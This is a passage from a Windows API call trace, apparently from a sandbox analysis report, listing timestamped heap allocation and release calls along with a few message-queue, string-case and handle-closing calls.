wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.549] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.551] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.551] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.551] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.551] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.552] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0164.552] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.552] FreeLibrary (hLibModule=0x74d40000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0164.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.552] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0164.553] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.553] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.553] CloseHandle (hObject=0x1e8) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0164.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0164.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0164.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0164.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0164.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0164.557] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0164.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0164.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0164.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0164.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0164.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0164.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0164.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0164.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0164.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0164.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0164.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0164.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0164.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.558] CloseHandle (hObject=0x170) returned 1 [0164.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0164.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0164.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0164.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0164.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0164.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0164.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0164.561] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0164.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0164.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0164.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0164.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0164.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0164.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0164.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0164.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0164.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c2258 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 